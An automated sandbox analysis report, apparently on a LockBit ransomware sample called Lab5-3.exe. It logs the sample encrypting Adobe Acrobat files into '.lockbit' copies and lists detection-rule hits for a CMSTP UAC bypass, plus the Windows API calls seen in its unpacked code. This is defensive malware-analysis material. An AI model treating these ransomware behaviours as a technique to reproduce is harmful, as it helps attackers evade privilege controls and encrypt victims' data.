                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\3379-chunk.js.lockbit entropy: 7.99901740534Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\js\plugin.js.lockbit entropy: 7.9990449963Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\fss\img\core_icons_retina.png.lockbit entropy: 7.99009411182Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\4109-chunk.js.lockbit entropy: 7.99370366057Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\fss\img\themes\dark\faf_icons_retina.png.lockbit entropy: 7.99335668095Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\fss\js\nls\de-de\ui-strings.js.lockbit entropy: 7.99120576539Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\fss\js\nls\fr-fr\ui-strings.js.lockbit entropy: 7.99036145693Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\fss\js\nls\pl-pl\ui-strings.js.lockbit entropy: 7.99135327645Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\fss\js\nls\ro-ro\ui-strings.js.lockbit entropy: 7.99031738204Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\fss\js\nls\ru-ru\ui-strings.js.lockbit entropy: 7.99266136563Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files-select\js\plugin.js.lockbit entropy: 7.99752714579Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\translations-nl-NL-json-chunk.js.lockbit entropy: 7.99793914787Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\translations-it-IT-json-chunk.js.lockbit entropy: 7.99785689725Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\Q3_2022_MakeChanges.webm.lockbit entropy: 7.99924431711Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\Q3_2022_SaveReadOnlyCopy.webm.lockbit entropy: 7.99865060505Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\translations-pl-PL-json-chunk.js.lockbit entropy: 7.9977606501Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\translations-en-IL-json-chunk.js.lockbit entropy: 7.99759452451Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\translations-hu-HU-json-chunk.js.lockbit entropy: 7.9982947049Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\translations-fr-MA-json-chunk.js.lockbit entropy: 7.9978808656Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\translations-de-DE-json-chunk.js.lockbit entropy: 7.9978325325Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\Q3_2022_ReorderPages.webm.lockbit entropy: 7.99898294975Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\translations-pt-BR-json-chunk.js.lockbit entropy: 7.99796561549Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\translations-en-AE-json-chunk.js.lockbit entropy: 7.99768099409Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\translations-sv-SE-json-chunk.js.lockbit entropy: 7.99785176128Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\desktop-help-chunk.js.lockbit entropy: 7.9993020155Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\translations-fr-FR-json-chunk.js.lockbit entropy: 7.99818387393Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\translations-eu-ES-json-chunk.js.lockbit entropy: 7.9977169149Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\translations-fi-FI-json-chunk.js.lockbit entropy: 7.9981214739Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\plugins\rhp\convertpdf-rna-selector.js.lockbit entropy: 7.9990523027Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\translations-ro-RO-json-chunk.js.lockbit entropy: 7.99829489277Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\translations-hr-HR-json-chunk.js.lockbit entropy: 7.99823019773Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\appmeasurement\prod\appmeasurement.js.lockbit entropy: 7.99729576466Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\Q3_2022_AddCustomPage.webm.lockbit entropy: 7.99919575364Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\edit-verb-object-chunk.js.lockbit entropy: 7.9972616561Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\translations-ru-RU-json-chunk.js.lockbit entropy: 7.99813804757Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\Q3_2022_FillAndSignYourForm.webm.lockbit entropy: 7.99930447825Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\translations-zh-CN-json-chunk.js.lockbit entropy: 7.99749220737Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\translations-tr-TR-json-chunk.js.lockbit entropy: 7.99804509668Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\translations-sk-SK-json-chunk.js.lockbit entropy: 7.99790267338Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\__VERSION__\dc-discovery-versions.js.lockbit entropy: 7.99199370864Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\translations-sl-SI-json-chunk.js.lockbit entropy: 7.99830806293Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\Q3_2022_ApplyRedactions.webm.lockbit entropy: 7.99847606192Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\appmeasurement\stage\appmeasurement.js.lockbit entropy: 7.99752492853Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\__VERSION__\dc-discovery.ec9f93f44788dcd05bd0.js.lockbit entropy: 7.9990323863Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\__VERSION__\connectors.ec9f93f44788dcd05bd0.js.lockbit entropy: 7.99838570135Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\translations-zh-TW-json-chunk.js.lockbit entropy: 7.99790004902Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\translations-uk-UA-json-chunk.js.lockbit entropy: 7.9983262646Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\Multimedia\MPP\WindowsMedia.mpp.lockbit entropy: 7.99918580989Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\__VERSION__\network-api.ec9f93f44788dcd05bd0.js.lockbit entropy: 7.99282350229Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\aicuc\js\nls\sv-se\ui-strings.js.lockbit entropy: 7.996541806Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\5251-chunk.js.lockbit entropy: 7.99417228124Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\8172-chunk.js.lockbit entropy: 7.99755135025Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\8329-chunk.js.lockbit entropy: 7.99884375284Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\9216-chunk.js.lockbit entropy: 7.99507565375Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\desktop-walkthrough-chunk.js.lockbit entropy: 7.99856024283Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\9488-chunk.js.lockbit entropy: 7.99244654147Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\ca-es\ui-strings.js.lockbit entropy: 7.99536536429Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\cs-cz\ui-strings.js.lockbit entropy: 7.99567983313Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\OWP\default\fonts\AdobeCleanUX-BoldIt.otf.lockbit entropy: 7.99890866373Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\OWP\default\css\manifest.min.css.lockbit entropy: 7.99850391551Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\OWP\default\fonts\MyriadPro-Bold.otf.lockbit entropy: 7.99812333533Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\OWP\default\fonts\AdobeCleanUX-It.otf.lockbit entropy: 7.99908236917Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\OWP\default\fonts\KeplerStd-Bold.otf.lockbit entropy: 7.99880014832Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\OWP\default\fonts\AdobeCleanUX-LightIt.otf.lockbit entropy: 7.99890039379Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\themes\dark\A12_Spinner_int_2x.gif.lockbit entropy: 7.99052948792Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\OWP\default\fonts\KeplerStd-Regular.otf.lockbit entropy: 7.99904646293Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\OWP\default\fonts\MyriadPro-Light.otf.lockbit entropy: 7.99773652004Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\themes\dark\core_icons.png.lockbit entropy: 7.99300198741Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\OWP\default\fonts\AdobeCleanUX-MediumIt.otf.lockbit entropy: 7.99891855075Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\OWP\default\fonts\MyriadPro-Regular.otf.lockbit entropy: 7.99832793907Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\OWP\default\fonts\MyriadPro-Semibold.otf.lockbit entropy: 7.99800311482Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\themes\dark\core_icons_retina.png.lockbit entropy: 7.99682900944Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\themes\dark\ind_prog.gif.lockbit entropy: 7.99240126622Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\themes\dark\progress_spinner2x.gif.lockbit entropy: 7.99575779252Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\themes\dark\progress_spinner_dark2x.gif.lockbit entropy: 7.99442144088Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\themes\dark\S_IlluEmptyStateCCFiles_280x192.svg.lockbit entropy: 7.99383004178Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\themes\dark\S_IlluDCFilesEmpty_180x180.svg.lockbit entropy: 7.99044112277Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\themes\dark\S_IlluEmptyStateDCFiles_280x192.svg.lockbit entropy: 7.99235368795Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\en-ae\ui-strings.js.lockbit entropy: 7.99553064859Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\nb-no\ui-strings.js.lockbit entropy: 7.99473904264Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\uk-ua\ui-strings.js.lockbit entropy: 7.99710395162Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\sv-se\ui-strings.js.lockbit entropy: 7.99591837883Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\zh-tw\ui-strings.js.lockbit entropy: 7.99524073061Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\core\dev\nls\zh-cn\ui-strings.js.lockbit entropy: 7.99542417756Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\themes\dark\s_signed_out.svg.lockbit entropy: 7.99326359375Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\OWP\default\images\pull-ring.png.lockbit entropy: 7.99683718753Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\plugins.js.lockbit entropy: 7.99373961828Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\OWP\default\js\vendor.min.js.lockbit entropy: 7.99797792888Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\css\main-cef.css.lockbit entropy: 7.99737206198Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\css\main.css.lockbit entropy: 7.9992820897Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\css\main-high-contrast.css.lockbit entropy: 7.99880735371Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\A12_Spinner_int_2x.gif.lockbit entropy: 7.99127744575Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\core_icons.png.lockbit entropy: 7.99382734734Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\core_icons_retina.png.lockbit entropy: 7.99704428974Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\file_types\aic_file_icons.png.lockbit entropy: 7.99703730703Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\file_types\aic_file_icons_retina_thumb.png.lockbit entropy: 7.9976203503Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\file_types\aic_file_icons_retina_thumb_new.png.lockbit entropy: 7.99681003791Jump to dropped file
                      Source: C:\Users\user\Desktop\Lab5-3.exeFile created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\images\file_types\hi_contrast\aic_file_icons_hiContrast_bow.png.lockbit entropy: 7.99674495718Jump to dropped file

                      System Summary

                      barindex
                      Source: Lab5-3.exe, type: SAMPLEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: Lab5-3.exe, type: SAMPLEMatched rule: Detects executables containing many references to VEEAM. Observed in ransomware Author: unknown
                      Source: 0.0.Lab5-3.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 0.0.Lab5-3.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing many references to VEEAM. Observed in ransomware Author: unknown
                      Source: 34.2.Lab5-3.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 34.2.Lab5-3.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing many references to VEEAM. Observed in ransomware Author: unknown
                      Source: 27.2.Lab5-3.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 27.2.Lab5-3.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing many references to VEEAM. Observed in ransomware Author: unknown
                      Source: 40.2.Lab5-3.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 40.2.Lab5-3.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing many references to VEEAM. Observed in ransomware Author: unknown
                      Source: 40.0.Lab5-3.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 40.0.Lab5-3.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing many references to VEEAM. Observed in ransomware Author: unknown
                      Source: 34.0.Lab5-3.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 34.0.Lab5-3.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing many references to VEEAM. Observed in ransomware Author: unknown
                      Source: 19.0.Lab5-3.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 19.0.Lab5-3.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing many references to VEEAM. Observed in ransomware Author: unknown
                      Source: 27.0.Lab5-3.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 27.0.Lab5-3.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing many references to VEEAM. Observed in ransomware Author: unknown
                      Source: 19.2.Lab5-3.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 19.2.Lab5-3.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables containing many references to VEEAM. Observed in ransomware Author: unknown
                      Source: C:\Users\user\Desktop\Lab5-3.exeProcess Stats: CPU usage > 49%
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 19_2_00416E10 EntryPoint,ExitProcess,RtlInitializeCriticalSection,CreateThread,CreateThread,NtSetInformationThread,NtSetInformationThread,Sleep,GetVersion,ExitProcess,ExitProcess,NtOpenProcess,GetSecurityInfo,RtlAllocateAndInitializeSid,RtlQueryInformationAcl,RtlLengthSid,malloc,RtlCreateAcl,RtlAddAccessDeniedAce,RtlGetAce,RtlGetAce,RtlAddAce,SetSecurityInfo,free,CreateThread,NtSetInformationThread,NtClose,RtlFreeSid,NtSetInformationProcess,RtlAdjustPrivilege,GetCurrentProcess,OpenProcessToken,GetTokenInformation,CloseHandle,CreateThread,NtSetInformationThread,CreateThread,NtSetInformationThread,ExitProcess,GetTickCount,GetTickCount,GetTickCount,GetConsoleWindow,IsWindowVisible,NtWaitForSingleObject,ExitProcess,19_2_00416E10
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 19_2_0041A8E0 CreateThread,NtSetInformationThread,NtAllocateVirtualMemory,GetWindowsDirectoryW,RtlAcquirePebLock,RtlInitUnicodeString,RtlInitUnicodeString,RtlInitUnicodeString,RtlReleasePebLock,LdrEnumerateLoadedModules,19_2_0041A8E0
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 19_2_00412680 NtSetInformationThread,NtOpenProcessToken,CreateWellKnownSid,CheckTokenMembership,NtQueryInformationToken,CheckTokenMembership,CloseHandle,CloseHandle,CloseHandle,19_2_00412680
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 19_2_0041A740 CreateThread,NtSetInformationThread,CoInitializeEx,CoUninitialize,19_2_0041A740
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 19_2_00406C40 NtSetInformationThread,19_2_00406C40
                      Source: C:\Users\user\Desktop\Lab5-3.exeCode function: 19_2_0041A450 WSAStartup,malloc,RtlInitializeSListHead,RtlInitializeCriticalSection,Sleep,Sleep,RtlInterlockedFlushSList,RtlDeleteCriticalSection,WSACleanup,CreateThread,NtSetInformationThread,Sleep,RtlInterlockedFlushSList,RtlDeleteCriticalSection,WSACleanup,free,ExitThread,19_2_0041A450
